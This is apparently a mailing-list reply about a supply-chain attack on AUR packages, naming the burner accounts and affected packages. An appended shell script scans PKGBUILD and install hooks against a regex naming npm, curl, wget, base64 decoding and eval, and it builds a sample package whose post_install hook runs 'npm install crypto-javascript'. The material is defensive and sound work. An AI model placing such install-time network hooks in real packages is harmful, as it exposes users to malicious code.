Hi Soufiane,
On 5/19/26 1:29 AM, Fariss, Soufiane wrote:
> Flagging an active coordinated supply-chain attack against the AUR
> observed on *2026-05-16 / 2026-05-17*. Three packages were adopted by
> three single-package burner accounts using @onionmail.org addresses,
> and the very first commit on each pushed an identical payload.
Thanks for bringing this to our attention; we are suspending the
concerned accounts and reverting the changes.
I've found quite a few additional candidates with a variant (running
"npm install crypto-javascript" in a new install script), pushed at the
same time.
Accounts:
* pierrethomas
* damienlebond
Packages:
* gnome-vfs
* expressvpn
* atomicwallet-bin
* exodus-bin
This is a not so kind reminder not to blindly trust AUR packages and to
verify before building/installing updates...
Best,
Hyacinthe
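An added example, not code from either message above: a small pre-build check a user could run on an AUR checkout to flag install-time commands that pull or run code from the network, such as the "npm install crypto-javascript" variant mentioned in the reply. The sample package it builds is constructed for the demo; the regex, function names and file layout (PKGBUILD plus *.install in one directory) are assumptions.

```shell
#!/bin/sh
# Patterns that have no business in a PKGBUILD or its install hooks
# (package managers, downloaders, decoders, eval). Assumed list, extend as needed.
SUSPECT_RE='(npm|pip3?|gem|cargo) install|curl |wget |base64 (-d|--decode)|eval '

# check_aur_pkg DIR: prints "<file>:<line>:<text>" for every suspicious line in
# DIR/PKGBUILD and DIR/*.install, then the total hit count on the last line.
# Always exits 0 so the output can be captured; a non-zero count means "review".
check_aur_pkg() {
  dir="$1"
  total=0
  for f in "$dir"/PKGBUILD "$dir"/*.install; do
    [ -f "$f" ] || continue          # unmatched glob or missing hook file
    n=$(grep -cE "$SUSPECT_RE" "$f" || true)
    [ "$n" -gt 0 ] && grep -nE "$SUSPECT_RE" "$f" | sed "s|^|$f:|"
    total=$((total + n))
  done
  echo "$total"
}

# make_sample_pkg DIR: constructed checkout (not a real AUR package) shaped like
# the variant: a harmless PKGBUILD whose install hook runs npm at post_install.
make_sample_pkg() {
  dir="$1"
  mkdir -p "$dir"
  cat > "$dir/PKGBUILD" <<'EOF'
pkgname=example-bin
pkgver=1.0
pkgrel=2
install=example-bin.install
package() { install -Dm755 example "$pkgdir/usr/bin/example"; }
EOF
  cat > "$dir/example-bin.install" <<'EOF'
post_install() {
  npm install crypto-javascript
}
EOF
}

# Stand-alone demo: build the sample, scan it, clean up.
demo_dir=$(mktemp -d)
make_sample_pkg "$demo_dir"
check_aur_pkg "$demo_dir"
rm -rf "$demo_dir"
```

Run it against a freshly cloned AUR package directory before `makepkg`; the scan is a coarse filter, so anything it prints still needs a human to read the diff.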